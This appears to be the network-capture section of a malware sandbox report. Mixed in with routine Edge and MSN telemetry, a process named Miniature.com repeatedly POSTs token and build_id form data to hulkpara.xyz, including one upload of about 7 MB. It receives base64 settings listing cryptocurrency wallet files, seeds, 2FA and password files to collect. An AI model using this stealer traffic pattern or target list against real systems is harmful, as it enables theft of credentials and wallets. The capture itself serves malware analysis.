                                                                                                                                                                                                                                                                                          ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                                          Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:02 GMT
                                                                                                                                                                                                                                                                                          Content-Length: 354
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          Akamai-Request-BC: [a=23.218.242.13,b=505835522,c=g,n=US_NJ_EDISON,o=20940]
                                                                                                                                                                                                                                                                                          Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                          Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                          Akamai-Server-IP: 23.218.242.13
                                                                                                                                                                                                                                                                                          Akamai-Request-ID: 1e267002
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Akamai-GRN: 0.0df2da17.1734592442.1e267002
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 49825 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:02 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HLX47Y5P8Q9ZM79HVAIW
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 131557
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-19 07:14:02 UTC | 16355 | OUT | Data Ascii: ------HLX47Y5P8Q9ZM79HVAIWContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------HLX47Y5P8Q9ZM79HVAIWContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------HLX47Y5P8Q9ZM79HVAIWCont
2024-12-19 07:14:04 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:04 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:14:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 49805 | 20.110.205.119 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:04 UTC | 1175 | OUT | GET /c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
2024-12-19 07:14:04 UTC | 1108 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Location: https://c.bing.com/c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=267493DD80724C64AC29441BD36923AF&RedC=c.msn.com&MXFR=08F1B41B03E76B2C0A73A14102FE6A7B
                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                          Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=08F1B41B03E76B2C0A73A14102FE6A7B; domain=.msn.com; expires=Tue, 13-Jan-2026 07:14:04 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:04 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 49812 | 108.139.47.108 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:04 UTC | 925 | OUT | GET /b?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-19 07:14:04 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:04 GMT
                                                                                                                                                                                                                                                                                          Location: /b2?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                          set-cookie: UID=1D5eb283802c974f6e27c9d1734592444; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                          set-cookie: XID=1D5eb283802c974f6e27c9d1734592444; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                          Via: 1.1 5b4b6c6517b988a4ff2c794e5583ee02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: 8dJZNWvx24-fCLUIMBBknTAUPyyiU7E8CRISy4_2rpfZidZy6UEI8A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 49832 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:05 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZ
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 6990993
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------FCB1VK689RQIEUAIMOPZCont
2024-12-19 07:14:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:12 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 49836 | 108.139.47.108 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:06 UTC | 1012 | OUT | GET /b2?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: UID=1D5eb283802c974f6e27c9d1734592444; XID=1D5eb283802c974f6e27c9d1734592444
2024-12-19 07:14:06 UTC | 326 | IN | HTTP/1.1 204 No Content
Connection: close
Date: Thu, 19 Dec 2024 07:14:06 GMT
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 008cd6752eb718142dfefe2f7e847982.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK50-P1
X-Amz-Cf-Id: BgUnGxJWHYaiuvJoNveC9CAmJO_It8E7qmtSwwCZNYVX2ZXMbimuXA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 49834 | 52.168.117.168 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:06 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597969345&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 3868
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
2024-12-19 07:14:06 UTC | 3868 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-19T08:46:09.341Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
2024-12-19 07:14:06 UTC | 894 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=bc2565e47c104127ab00e5380c445c3b&HASH=bc25&LV=202412&V=4&LU=1734592446543; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:06 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=d9203e547fe94d2c85c86b9ae935720e; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:06 GMT; Path=/;Secure; SameSite=None
time-delta-millis: -5522802
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Thu, 19 Dec 2024 07:14:05 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 49842 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:06 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EK6XT0RIWTRQQQI5XT00
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:14:06 UTC | 331 | OUT | Data Ascii: ------EK6XT0RIWTRQQQI5XT00Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------EK6XT0RIWTRQQQI5XT00Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------EK6XT0RIWTRQQQI5XT00Cont
2024-12-19 07:14:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:14:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:14:07 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 49843 | 20.110.205.119 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:06 UTC | 1261 | OUT | GET /c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=267493DD80724C64AC29441BD36923AF&MUID=08F1B41B03E76B2C0A73A14102FE6A7B HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; SM=T
2024-12-19 07:14:07 UTC | 982 | IN | HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                          Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=08F1B41B03E76B2C0A73A14102FE6A7B; domain=.msn.com; expires=Tue, 13-Jan-2026 07:14:07 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                          Set-Cookie: SRM_M=08F1B41B03E76B2C0A73A14102FE6A7B; domain=c.msn.com; expires=Tue, 13-Jan-2026 07:14:07 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 26-Dec-2024 07:14:07 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 19-Dec-2024 07:24:07 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:06 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:07 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
36          192.168.2.7  49850        94.130.191.168  443               7416  C:\Users\user\AppData\Local\Temp\325114\Miniature.com

Timestamp  Bytes transferred  Direction  Data
2024-12-19 07:14:08 UTC  324  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----H4O8GV3OZMOZMYMG4WTR
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:14:08 UTC  331  OUT  Data Ascii: ------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------H4O8GV3OZMOZMYMG4WTRContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------H4O8GV3OZMOZMYMG4WTRCont
2024-12-19 07:14:09 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:14:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:14:09 UTC  1524  IN  Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
37          192.168.2.7  49854        94.130.191.168  443               7416  C:\Users\user\AppData\Local\Temp\325114\Miniature.com

Timestamp  Bytes transferred  Direction  Data
2024-12-19 07:14:11 UTC  324  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ZM7Q1DTJW4E37Q9ZCBA1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:14:11 UTC  453  OUT  Data Ascii: ------ZM7Q1DTJW4E37Q9ZCBA1Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------ZM7Q1DTJW4E37Q9ZCBA1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZM7Q1DTJW4E37Q9ZCBA1Cont
2024-12-19 07:14:12 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
